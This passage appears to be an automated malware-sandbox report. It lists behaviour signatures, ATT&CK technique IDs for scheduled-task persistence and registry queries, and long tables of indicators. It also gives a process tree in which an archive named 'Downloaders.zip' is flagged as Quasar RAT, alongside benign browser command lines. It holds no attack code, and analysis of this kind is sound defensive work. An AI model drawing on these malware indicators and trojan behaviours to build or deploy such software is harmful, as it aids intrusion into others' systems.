12684	Process not Found
22620	Process not Found
23368	Process not Found
7160	Process not Found
11020	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2512	schtasks.exe
128444	Process not Found
128460	Process not Found
129112	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3940	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
3464	7zFM.exe
1584	taskmgr.exe
3940	explorer.exe
33104	Process not Found
2616	New Text Document mod.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe
4812	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3464	7zFM.exe
Token: 35	3464	7zFM.exe
Token: SeSecurityPrivilege	3464	7zFM.exe
Token: SeDebugPrivilege	1584	taskmgr.exe
Token: SeSystemProfilePrivilege	1584	taskmgr.exe
Token: SeCreateGlobalPrivilege	1584	taskmgr.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeDebugPrivilege	4428	firefox.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe
Token: SeShutdownPrivilege	4812	chrome.exe
Token: SeCreatePagefilePrivilege	4812	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3464	7zFM.exe
3464	7zFM.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
1584	taskmgr.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe
1584	taskmgr.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
4428	firefox.exe
1676	firefox.exe
2732	o.exe
1768	RegAsm.exe
1844	Setup2.exe
1388	tik-tok-1.0.5.0-installer_iPXA-F1.exe
1388	tik-tok-1.0.5.0-installer_iPXA-F1.exe
3940	explorer.exe
3940	explorer.exe
5332	svchost.exe
1944	tpeinf.exe
2296	1522032729.exe
3308	safman_setup.exe
5628	safman_setup.tmp
6612	safman.exe
18420	Process not Found
20732	Process not Found
34364	Process not Found
51716	Process not Found
53772	Process not Found
129424	Process not Found
138884	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4572 wrote to memory of 4428	4572	firefox.exe	92
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 4428 wrote to memory of 4424	4428	firefox.exe	93
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95
PID 3340 wrote to memory of 4756	3340	firefox.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3312
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
  2⤵
  - Quasar RAT
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3464
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1584
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Sets desktop wallpaper using registry
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f36e8f1-e5de-4804-81c2-a6c7b4848eb9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" gpu
      4⤵
      PID:4424
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2360 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9502f252-4691-4e83-b72e-d7ef7eea75c3} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" socket
      4⤵
      Checks processor information in registry
      PID:4912
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3140 -childID 1 -isForBrowser -prefsHandle 3236 -prefMapHandle 3272 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0874f24-1268-4100-adea-86b7de78a924} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:3876
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 2 -isForBrowser -prefsHandle 3748 -prefMapHandle 3732 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27e82e73-ccb4-4559-a2c9-981653d60548} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:4132
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3908 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 1600 -prefMapHandle 4136 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ce282cc-d15e-4933-b070-ffe92e8abfd9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility
      4⤵
      Checks processor information in registry
      PID:3032
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 3 -isForBrowser -prefsHandle 5552 -prefMapHandle 5544 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fc8c14e-5c2b-4a38-a484-6d7bf623230e} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:4360
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 4 -isForBrowser -prefsHandle 5684 -prefMapHandle 5688 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a9193fd-9d0e-4104-a80d-28c0cf830ad0} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:408
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5900 -childID 5 -isForBrowser -prefsHandle 5912 -prefMapHandle 5516 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae9d889b-d916-4a68-a1f4-ff05a09fab53} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:2564
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6260 -childID 6 -isForBrowser -prefsHandle 6276 -prefMapHandle 6272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45924f1d-dc5c-42a9-93bc-db5906a81dfc} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:3332
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 7 -isForBrowser -prefsHandle 5580 -prefMapHandle 5576 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86532d58-be2a-4e21-b505-b4eaf8001ebe} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
      4⤵
      PID:2148
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    PID:4756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  PID:4812
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc62ccc40,0x7ffdc62ccc4c,0x7ffdc62ccc58
    3⤵
    PID:3948
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1832 /prefetch:2
    3⤵
    PID:1128
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2112 /prefetch:3
    3⤵
    PID:3844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2212 /prefetch:8
    3⤵
    PID:1448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3152 /prefetch:1
    3⤵
    PID:3860
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3404 /prefetch:1
    3⤵
    PID:2356
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4388,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4424 /prefetch:1
    3⤵
    PID:3956
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4820,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4616 /prefetch:8
    3⤵
    PID:3848
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4600 /prefetch:8
    3⤵
    PID:3484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4680,i,1831177371653383731,16064683861563688328,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3556 /prefetch:1
    3⤵
    PID:2876
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:3324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:1676
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1796 -parentBuildID 20240401114208 -prefsHandle 1628 -prefMapHandle 1620 -prefsLen 24418 -prefMapSize 244977 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50f6498f-4421-44db-b867-7d074f958012} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" gpu
      4⤵
      PID:864
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2196 -parentBuildID 20240401114208 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 24418 -prefMapSize 244977 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d07e071-05a7-4dc8-9dde-ea58f07093b5} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" socket
      4⤵
      Checks processor information in registry
      PID:3760
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3464 -childID 1 -isForBrowser -prefsHandle 3468 -prefMapHandle 3292 -prefsLen 24917 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da6deee3-8906-4072-8714-338d694e2619} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:4708
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3100 -childID 2 -isForBrowser -prefsHandle 3192 -prefMapHandle 2824 -prefsLen 30150 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76032167-73a6-4748-9585-1125de8eb606} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:768
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4504 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4488 -prefMapHandle 4380 -prefsLen 30150 -prefMapSize 244977 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9719ddb1-8320-404e-9c77-53fcfedc561e} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" utility
      4⤵
      Checks processor information in registry
      PID:2400
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5200 -childID 3 -isForBrowser -prefsHandle 5172 -prefMapHandle 5160 -prefsLen 27721 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf718a75-199f-4604-b1fe-c243dfc9fec0} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:5036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 4 -isForBrowser -prefsHandle 5448 -prefMapHandle 5444 -prefsLen 27721 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a416b2f-8841-4229-b31c-5488ec28cac6} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:3308
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 5 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 27721 -prefMapSize 244977 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f3df13e-555c-4189-9b67-fbaf916f95d0} 1676 "\\.\pipe\gecko-crash-server-pipe.1676" tab
      4⤵
      PID:1716
  - - C:\Program Files\Mozilla Firefox\firefox.exe
